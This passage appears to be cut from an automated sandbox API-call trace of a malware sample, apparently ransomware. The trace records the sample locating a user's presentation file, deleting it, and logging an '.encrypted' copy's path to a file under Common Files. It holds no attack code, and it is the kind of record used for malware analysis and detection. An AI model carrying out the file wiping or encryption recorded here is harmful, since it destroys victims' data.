wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.416] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0033.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0033.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.416] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.416] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.416] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa250b20, ftCreationTime.dwHighDateTime=0x1d5b933, ftLastAccessTime.dwLowDateTime=0x49e72aa0, ftLastAccessTime.dwHighDateTime=0x1d5b83d, ftLastWriteTime.dwLowDateTime=0x49e72aa0, ftLastWriteTime.dwHighDateTime=0x1d5b83d, nFileSizeHigh=0x0, nFileSizeLow=0xd257, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bQdze 0.odp", cAlternateFileName="BQDZE0~1.ODP")) returned 0x7c2100 [0033.416] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0033.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.416] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.416] CharLowerBuffW (in: lpsz="byte[53847]", cchLength=0xb | out: lpsz="byte[53847]") returned 0xb [0033.416] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.416] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0033.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.416] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.416] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.416] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0033.416] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0033.417] FreeLibrary (hLibModule=0x76b40000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.417] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.417] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.417] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.417] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0033.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0033.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.418] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0033.418] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\bqdze 0.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0033.419] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.419] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.419] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.419] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.419] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.419] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.419] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.419] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.419] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.420] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.420] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.420] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.420] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.420] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.420] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.420] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.420] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.420] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", lpFilePart=0x0) returned 0x4f [0033.420] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa250b20, ftCreationTime.dwHighDateTime=0x1d5b933, ftLastAccessTime.dwLowDateTime=0x49e72aa0, ftLastAccessTime.dwHighDateTime=0x1d5b83d, ftLastWriteTime.dwLowDateTime=0x13ccffe0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xd257, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="bQdze 0.odp", cAlternateFileName="BQDZE0~1.ODP")) returned 0x7c2100 [0033.420] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\bqdze 0.odp")) returned 1 [0033.422] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa250b20, ftCreationTime.dwHighDateTime=0x1d5b933, ftLastAccessTime.dwLowDateTime=0x49e72aa0, ftLastAccessTime.dwHighDateTime=0x1d5b83d, ftLastWriteTime.dwLowDateTime=0x13ccffe0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xd257, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="bQdze 0.odp", cAlternateFileName="BQDZE0~1.ODP")) returned 0 [0033.422] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.422] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.422] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.422] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.423] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.423] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.423] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.423] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.423] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.423] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.423] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.424] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.424] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.424] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.424] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.424] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.424] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.424] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.424] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xfeb, lpOverlapped=0x0) returned 1 [0033.424] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.424] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xfeb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.424] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0033.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.encrypted.odp\r\n", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0033.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5c) returned 0x87a9d8 [0033.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.encrypted.odp\r\n", cchWideChar=92, lpMultiByteStr=0x87a9d8, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.encrypted.odp\r\n", lpUsedDefaultChar=0x0) returned 92 [0033.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0033.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0033.426] WriteFile (in: hFile=0x140, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x5b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x5b, lpOverlapped=0x0) returned 1 [0033.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0033.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.426] CloseHandle (hObject=0x140) returned 1 [0033.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0033.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.428] HeapFree (in: 